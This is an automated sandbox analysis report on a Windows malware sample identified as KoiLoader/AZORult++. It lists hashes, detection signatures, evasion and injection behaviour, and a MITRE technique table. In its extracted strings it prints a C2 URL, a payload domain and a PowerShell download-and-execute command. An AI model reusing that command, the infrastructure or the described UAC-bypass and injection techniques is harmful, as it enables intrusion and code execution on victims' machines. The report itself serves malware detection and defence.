Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JT1yqn67un.exe

Overview

General Information

Sample name:JT1yqn67un.exe
renamed because original name is a hash value
Original sample name:9e88e85a46486f7f56b3aaba6e29737c.exe
Analysis ID:1528834
MD5:9e88e85a46486f7f56b3aaba6e29737c
SHA1:c33d28a63c240f4677b185e7cbc918da3d4f49ec
SHA256:deb72a5ebd26b40dc1847314d896b4e768f6f14d95fcfcbf1046c65518df5883
Tags:exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected AZORult++ Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • JT1yqn67un.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\JT1yqn67un.exe" MD5: 9E88E85A46486F7F56B3AABA6E29737C)
  • cleanup
{"C2": "http://2.58.14.95/malto.php", "Payload url": "https://lacasadelverde.com/css"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
    00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
        00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Process Memory Space: JT1yqn67un.exe PID: 7460JoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            0.2.JT1yqn67un.exe.5e0000.0.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
              0.2.JT1yqn67un.exe.5e0000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.JT1yqn67un.exe.5e0000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x1808:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x9bf6:$s1: CoGetObject
                0.2.JT1yqn67un.exe.bb0b78.1.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
                  0.2.JT1yqn67un.exe.bb0b78.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 3 entries
                    No Sigma rule has matched
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: JT1yqn67un.exeAvira: detected
                    Source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: KoiLoader {"C2": "http://2.58.14.95/malto.php", "Payload url": "https://lacasadelverde.com/css"}
                    Source: JT1yqn67un.exeReversingLabs: Detection: 71%
                    Source: JT1yqn67un.exeVirustotal: Detection: 58%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: JT1yqn67un.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E8710 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_005E8710
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E93B0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_005E93B0

                    Exploits

                    barindex
                    Source: Yara matchFile source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JT1yqn67un.exe.bb0b78.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: JT1yqn67un.exe PID: 7460, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E72E0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize,0_2_005E72E0
                    Source: JT1yqn67un.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: JT1yqn67un.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F0993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00F0993E
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_005E89F0

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: http://2.58.14.95/malto.php
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E6410 inet_pton,inet_pton,htons,htons,inet_pton,htons,socket,socket,connect,connect,socket,connect,closesocket,select,recv,send,select,closesocket,closesocket,GetProcessHeap,HeapFree,0_2_005E6410
                    Source: JT1yqn67un.exeString found in binary or memory: http://2.58.14.95/malto.php
                    Source: JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://2.58.14.95/malto.php%temp%
                    Source: JT1yqn67un.exeString found in binary or memory: https://lacasadelverde.com/css
                    Source: JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://lacasadelverde.com/css/c

                    E-Banking Fraud

                    barindex
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E9250 EntryPoint,GetUserDefaultLangID,ExitProcess,0_2_005E9250

                    System Summary

                    barindex
                    Source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E5C60 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_005E5C60
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E5FD0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_005E5FD0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F0FBC10_2_00F0FBC1
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E89F00_2_005E89F0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E7C300_2_005E7C30
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E26A00_2_005E26A0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E77100_2_005E7710
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E43D00_2_005E43D0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E47D00_2_005E47D0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: String function: 00F050E0 appears 33 times
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: String function: 00F03CE0 appears 82 times
                    Source: JT1yqn67un.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: classification engineClassification label: mal100.bank.troj.expl.evad.winEXE@1/0@0/0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E6370 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_005E6370
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E6C60 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,0_2_005E6C60
                    Source: JT1yqn67un.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: JT1yqn67un.exeReversingLabs: Detection: 71%
                    Source: JT1yqn67un.exeVirustotal: Detection: 58%
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeSection loaded: uxtheme.dllJump to behavior
                    Source: JT1yqn67un.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: JT1yqn67un.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: JT1yqn67un.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: JT1yqn67un.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: JT1yqn67un.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: JT1yqn67un.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: JT1yqn67un.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: JT1yqn67un.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: JT1yqn67un.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: JT1yqn67un.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: JT1yqn67un.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: JT1yqn67un.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: JT1yqn67un.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JT1yqn67un.exe.bb0b78.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: JT1yqn67un.exe PID: 7460, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F01300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00F01300
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F102D1 push ecx; ret 0_2_00F102E4

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_005E89F0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_005E89F0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13001
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-13187
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeFile opened / queried: C:\Windows\System32\VBoxService.exeJump to behavior
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeAPI coverage: 9.8 %
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F0993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00F0993E
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_005E89F0
                    Source: JT1yqn67un.exeBinary or memory string: Hyper-V
                    Source: JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: POST%s|%s|hhlT6dDnStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://2.58.14.95/malto.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://lacasadelverde.com/css/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
                    Source: JT1yqn67un.exeBinary or memory string: VMWare
                    Source: JT1yqn67un.exeBinary or memory string: %systemroot%\System32\VBoxService.exe
                    Source: JT1yqn67un.exeBinary or memory string: %systemroot%\System32\VBoxTray.exe
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeAPI call chain: ExitProcess graph end nodegraph_0-13106
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeAPI call chain: ExitProcess graph end nodegraph_0-11654
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F076CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F076CB
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F01300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00F01300
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F01710 mov ecx, dword ptr fs:[00000030h]0_2_00F01710
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E7920 mov eax, dword ptr fs:[00000030h]0_2_005E7920
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E5FD0 mov eax, dword ptr fs:[00000030h]0_2_005E5FD0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F0B779 GetProcessHeap,0_2_00F0B779
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F05016 SetUnhandledExceptionFilter,0_2_00F05016
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F049BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F049BE
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F076CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F076CB
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F04E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F04E89

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E5C60 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_005E5C60
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe0_2_005E94B0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe0_2_005E94B0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe0_2_005E94B0
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F05125 cpuid 0_2_00F05125
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_00F04D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F04D70
                    Source: C:\Users\user\Desktop\JT1yqn67un.exeCode function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_005E89F0
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    21
                    Virtualization/Sandbox Evasion
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
